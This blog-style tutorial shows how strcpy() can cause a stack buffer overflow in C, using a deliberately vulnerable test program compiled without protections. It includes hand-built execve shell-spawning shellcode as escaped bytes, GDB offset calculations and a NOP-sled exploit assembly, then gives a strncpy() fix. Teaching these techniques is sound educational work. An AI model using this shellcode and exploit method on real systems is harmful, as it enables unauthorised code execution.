Unsafe functions vulnerabilities in C

Table of Contents

Introduction

It is well known that C is a programming language that gives you a lot of freedom in memory management, with both advantages and drawbacks. In this page I would like to show an example of vulnerability analysis, to demonstrate that something that apparently looks inoffensive, or just a simple “segmentation fault” can, depending on the application, turn into a real security vulnerability.

Environment

Element	Version
Operating System	Ubuntu 24.04.3 LTS
Architecture	x86_64 (64 bits)
GCC	13.3.0
OBJDUMP	2.42
LD	2.42
NASM	2.16.01

The vulnerable program

This is an example of a typical (unsafe) use of an insecure function like strcpy() , which copies the content of the source into the destination pointer until a null terminator \0 is found.

#include <stdio.h>
#include <string.h>

void copy_info(char *info)
{
    char buf[80];
    strcpy(buf, info);

    printf("Introduced text: %s\n", buf);
}

int main(int argc, char *argv[]) {
    copy_info(argv[1]);

    return 0;
}

The risk comes because the function does not check the size of the destination buffer, so it can lead to a buffer overflow, potentially writing into memory outside of our “variable”.

In order to compile the example, we need to use the following command:

gcc -m64 -fno-stack-protector -z execstack -no-pie example.c -o example

-fno-stack-protector : By default, there are some security mechanisms (canaries) that detect when an overflow is happening. We remove it because otherwise our overflow will be prevented.
execstack : Allows execution on the stack.
no-pie : This is a precondition to disable ASLR (Address Space Layout Randomization). This option is recommended for demonstration purposes because otherwise, the base address of the stack will be different, and it would make executing the vulnerability harder.

Then we run it:

$ ./example "hello"
Introduced text: hello

Let’s see how we can take advantage of the unsafe usage of that function to open a shell. We are introducing the string via stdin, but it can come from any other source.

Creating the shellcode

There are many ready-made shellcodes available online, but for learning purposes we will create our own.

The easiest way to do this is to let the compiler (gcc) generate it for us.

First, we write a small C program that simply spawns a shell:

#include <unistd.h>
int main( )
{
  char* argv[2];
  argv[0] = "/bin/sh";
  argv[1] = 0;
  execve("/bin/sh", argv, NULL);
  return 0;
}

Then compile it:

gcc -m64 -O0 -no-pie -fno-stack-protector shellcode.c -o shellcode

And dump the code with objdump:

115 0000000000401136 <main>:
116   401136: f3 0f 1e fa           endbr64
117   40113a: 55                    push   rbp
118   40113b: 48 89 e5              mov    rbp,rsp
119   40113e: 48 83 ec 10           sub    rsp,0x10
120   401142: 48 8d 05 bb 0e 00 00  lea    rax,[rip+0xebb]        # 402004 <_IO_stdin_used+0x4>
121   401149: 48 89 45 f0           mov    QWORD PTR [rbp-0x10],rax
122   40114d: 48 c7 45 f8 00 00 00  mov    QWORD PTR [rbp-0x8],0x0
123   401154: 00
124   401155: 48 8d 45 f0           lea    rax,[rbp-0x10]
125   401159: ba 00 00 00 00        mov    edx,0x0
126   40115e: 48 89 c6              mov    rsi,rax
127   401161: 48 8d 05 9c 0e 00 00  lea    rax,[rip+0xe9c]        # 402004 <_IO_stdin_used+0x4>
128   401168: 48 89 c7              mov    rdi,rax
129   40116b: e8 d0 fe ff ff        call   401040 <execve@plt>
130   401170: b8 00 00 00 00        mov    eax,0x0
131   401175: c9                    leave
132   401176: c3                    ret
133
134 Disassembly of section .fini:

We cannot use this code directly as shellcode because it contains too much “noise” (memory initializations, argument handling, literal loads from .data , etc.).

The code is actually quite simple: it loads the arguments into %rdi and %rsi , and then executes the function.

That is the part we want to copy and use as shellcode (note that the second argument is a null-terminated array, which in C is just a zero).

The bigger issue is that we are loading the string literal /bin/sh from the data section, and we need to embed it directly into the code. A clever way to do this is to convert it into an int. For that, I used Python to perform the conversion.

$ python3
>>> n = int.from_bytes(b'/bin/sh', 'little')
>>> hex(n)
'0x68732f2f6e69622f'

So the final nasm code would be:

BITS 64
global _start

_start:
    endbr64
    push   rbp
    mov    rbp,rsp
    sub    rsp,0x10

    xor rax, rax
    push rax

    mov rax, 0x0068732f2f6e69622f
    push rax

    mov rdi, rsp

    xor rax, rax
    push rax

    mov rsi, rsp
    xor rdx, rdx
    mov al, 59
    syscall

By using nasm and ld we can test it:

$ nasm -f elf64 shellcode.nasm
$ ld shellcode.o -o shellcode

$ ./shellcode
$ > whoami
fiti
$ > exit
$

Great, now we need to “extract” the shellcode from it. In other words, get the “code” that we need to “inject” into the software.

As we are going to use the encoded hex code, I used objdump for that.

objdump -d -M intel64 shellcode.o

shellcode.o:    file format elf64-x86-64

Disassembly of section .text:

000000000000000 <_start>:

    0:    f3 0f 1e fa       endbr64
    4:    55                push   %rbp
    5:    48 89 e5          mov    %rsp,%rbp
    8:    48 83 ec 10       sub    $0x10,%rsp
    
    ..... etc ...

Note: A small change I’ve done is to reserve more memory into the stack (0x10 -> 0x80), to prevent the shellcode to overwrite itself.

All we need to do is to copy the hexadecimal code of the shellcode and build a string by escaping them:

\xf3\x0f\x1e\xfa\x55\x48\x89\xe5\x48\x83\xec\x10\x48\x31\xc0\x50\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xc0\x50\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05

Now we are ready to inject the shellcode into our test program!

Injecting the shellcode

There are several things we need to know to inject the shellcode, but the most important is the base address. As we disabled ASLR, the base address will be the same for all executions. If we wouldn’t disable it, it complicates a bit, because every time the program executes, the base address would be different. In that case, “brute force” can be used, by executing multiple times the program until hit the right address.

Let’s explore it with GDB:

gdb example

First thing to do is to explore the return address of the function copy_info(). For that, we can disassemble the main() and put a breakpoint just before calling copy_info():

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000401197 <+0>:	endbr64
   0x000000000040119b <+4>:	push   %rbp
   0x000000000040119c <+5>:	mov    %rsp,%rbp
   0x000000000040119f <+8>:	sub    $0x10,%rsp
   0x00000000004011a3 <+12>:	mov    %edi,-0x4(%rbp)
   0x00000000004011a6 <+15>:	mov    %rsi,-0x10(%rbp)
   0x00000000004011aa <+19>:	mov    -0x10(%rbp),%rax
   0x00000000004011ae <+23>:	add    $0x8,%rax
   0x00000000004011b2 <+27>:	mov    (%rax),%rax
=> 0x00000000004011b5 <+30>:	mov    %rax,%rdi
   0x00000000004011b8 <+33>:	call   0x401156 <copy_info>
   0x00000000004011bd <+38>:	mov    $0x0,%eax
   0x00000000004011c2 <+43>:	leave
   0x00000000004011c3 <+44>:	ret

Then put a breakpoint into 0x4011b5.

(gdb) b *0x4011b5
Breakpoint 1 at 0x4011b5

And set, initially for testing purposes, the input of A’s.

(gdb) r "AAAAAAAAAA"

Then, make a stepi (or si) to go through copy_info() call. Remember that the first thing to be done is pushing into the stack the return address. So, printing the stack pointer, we know where it is located the return address:

(gdb) r "AAAAAAAAAA"
Starting program: /home/fiti/Repositories/PRAC/example "AAAAAAAAAA"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x00000000004011b5 in main ()
(gdb) si
0x00000000004011b8 in main ()
(gdb) si
0x0000000000401156 in copy_info ()
(gdb) x $rsp
0x7fffffffdc38:	0x004011bd

So we know that the return address is, of course, 0x4011bd (we already know that from the disassembly), and it is stored at 0x7fffffffdc38. Remember this address. This is key, because when we inspect the stack, we want to overwrite just that address to change the return address by the one where the shellcode is stored.

Next thing to do is to see how the vulnerable function works. Let’s put a breakpoint right after the strcpy() function:

(gdb) disassemble copy_info
Dump of assembler code for function copy_info:
=> 0x0000000000401156 <+0>:	endbr64
   0x000000000040115a <+4>:	push   %rbp
   0x000000000040115b <+5>:	mov    %rsp,%rbp
   0x000000000040115e <+8>:	sub    $0x60,%rsp
   0x0000000000401162 <+12>:	mov    %rdi,-0x58(%rbp)
   0x0000000000401166 <+16>:	mov    -0x58(%rbp),%rdx
   0x000000000040116a <+20>:	lea    -0x50(%rbp),%rax
   0x000000000040116e <+24>:	mov    %rdx,%rsi
   0x0000000000401171 <+27>:	mov    %rax,%rdi
   0x0000000000401174 <+30>:	call   0x401050 <strcpy@plt>
   0x0000000000401179 <+35>:	lea    -0x50(%rbp),%rax
   0x000000000040117d <+39>:	mov    %rax,%rsi
   0x0000000000401180 <+42>:	lea    0xe7d(%rip),%rax        # 0x402004
   0x0000000000401187 <+49>:	mov    %rax,%rdi
   0x000000000040118a <+52>:	mov    $0x0,%eax
   0x000000000040118f <+57>:	call   0x401060 <printf@plt>
   0x0000000000401194 <+62>:	nop
   0x0000000000401195 <+63>:	leave
   0x0000000000401196 <+64>:	ret
End of assembler dump.
(gdb) b *0x401179
Breakpoint 2 at 0x401179
(gdb) c
Continuing.

Breakpoint 2, 0x0000000000401179 in copy_info ()

Let’s inspect the stack right now:

(gdb) x/50gx $rsp
0x7fffffffdbd0:	0x0000000006000000	0x00007fffffffe118
0x7fffffffdbe0:	0x4141414141414141	0x00007fffff004141  <--- Here is our string
0x7fffffffdbf0:	0x0000006100000019	0x0000000000000000
0x7fffffffdc00:	0x0000000000000000	0x0000000000000000
0x7fffffffdc10:	0x0000000000000000	0x0000000000000000
0x7fffffffdc20:	0x0000000000000000	0x0000000000000000
0x7fffffffdc30:	0x00007fffffffdc50	0x00000000004011bd  <--- Here is the return addr!
0x7fffffffdc40:	0x00007fffffffdd78	0x00000002ffffdd78
0x7fffffffdc50:	0x00007fffffffdcf0	0x00007ffff7c2a1ca
 .... snip ....

Well, this picture is pretty clear: We need to write as much information (our shellcode), and overwrite the address 0x7fffffffdc38 with the address of the start of our shellcode. So we need to calculate exactly how many bytes must be written before the return address. They probably won’t match, so we will append at the beginning NOOP until fill it. Remember that, when the cpu starts to execute NOOP, it just go to the next instruction, just like a cascade. Until reach our shellcode.

In human words, what we want to achieve is:

(gdb) x/50gx $rsp
0x7fffffffdbd0:	0x0000000006000000	0x00007fffffffe118
0x7fffffffdbe0:	0xnoopnoopnoopnoop	0xnoopnoopnoopnoop 
0x7fffffffdbf0:	0xnoopnoopnoopnoop	0xnoopnoopnoopnoop
0x7fffffffdc00:	0xnoopnoopnoopnoop	0xnoopnoopnoopnoop
0x7fffffffdc10:	0xmyshellcode    	0xnoopnoopnoopnoop
0x7fffffffdc20:	0xnoopnoopnoopnoop	0xnoopnoopnoopnoop
0x7fffffffdc30:	0xnoopnoopnoopnoop	0x7fffffffdbe0  <--- Overwritten this addr!
0x7fffffffdc40:	0x00007fffffffdd78	0x00000002ffffdd78
0x7fffffffdc50:	0x00007fffffffdcf0	0x00007ffff7c2a1ca
 .... snip ....

The size of the payload (exactly), can be calculated within the gdb. Just subtracting the return address with the target one, as follow:

(gdb) print (0x7fffffffdc38-0x7fffffffdbe0)
$1 = 88

We need to create a payload of 88 bytes, while our shellcode had 44 bytes, and the return address is 6 bytes (0x7fffffffdbe0), so we need to add a padding of 88-50=38 bytes.

We can craft it, directly with the shell (or using python, perl, or whatever you like the most):

printf '\xf3\x0f\x1e\xfa\x55\x48\x89\xe5\x48\x83\xec\x80\x48\x31\xc0\x50\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xc0\x50\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05' > shellcode.bin

Doing the same with the padding.bin (with NOOP, which is \x90 code) and retaddr.bin, we can concatenate them at the end to get our final exploit:

cat padding.bin shellcode.bin retaddr.bin > exploit.bin

And if we finally execute the original program by passing our exploit as input, we are able to open a shell:

$ ./example $(cat exploit.bin)
Introduced text: ����������������������������������������������UH��H��H1�PH�/bin//shPH��H1�PH��H1Ұ;����
whoami
fiti

Important:

GDB is a good playground, but it can confuse you a bit because it adds some things in the stack, modifying the base address. As a consequence of that, your exploit could work in the GDB but not outside it. Instead, you will likely obtain a SEGFAULT, generating a core dump. This is very useful, because you can open it with gdb example core and inspect exactly what the address is, adjusting the exploit for your specific scenario.

Conclusion

C is a brilliant and powerful language that provides a lot of flexibility with the memory management. However, improper use can cause significant security vulnerabilities.

In our example, we were able to open a shell in a simple software that was not definitely intended for that. A safer approach for the copy_info() function would be:

void copy_info(char *info)
{
    char buf[80];
    strncpy(buf, info, sizeof(buf) - 1); // <--- FIX
	buf[sizeof(buf) - 1] = '\0'; // <---- Force the NULL termination.

    printf("Introduced text: %s\n", buf);
}

By using strncpy(), we limit the number of elements to copy, preventing the overflow.
Forcing the null-terminating, ensure that calling str functions is safe (remember that, in C, a string is just an array of chars null terminated).